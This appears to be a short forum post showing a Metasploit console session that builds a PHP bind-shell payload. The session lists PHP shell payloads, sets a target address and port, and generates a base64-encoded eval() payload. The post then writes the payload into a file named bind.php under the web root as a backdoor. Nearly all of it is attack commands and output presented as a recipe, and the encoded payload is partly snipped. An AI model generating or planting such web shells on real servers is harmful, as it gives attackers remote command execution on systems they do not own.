HI EVERYONE
LIKE THE TITLE SAD
كود:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ Metasploit v3.5.2-beta [core:3.5 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11722 updated 4 days ago (2011.02.08)
msf > search php
[*] Searching loaded modules for pattern 'php'...
<--BIG SNIP-->
NOP Generators
==============
Name Disclosure Date Rank Description
---- --------------- ---- -----------
php/generic normal PHP Nop Generator
Payloads
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
php/shell_findsock normal PHP Command Shell, Find Sock
msf > use php/bind_php
msf payload(bind_php) > show options
Module options (payload/php/bind_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
msf payload(bind_php) > set RHOST 192.168.1.5
RHOST => 192.168.1.5
msf payload(bind_php) > set LPORT 4321
LPORT => 4321
msf payload(bind_php) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-x <opt> The executable template to use
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
msf payload(bind_php) > exit
root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php
#pentest101.blogspot.com كود:
http://pastebin.com/5G1sH1x9
Metasploit PHP Shell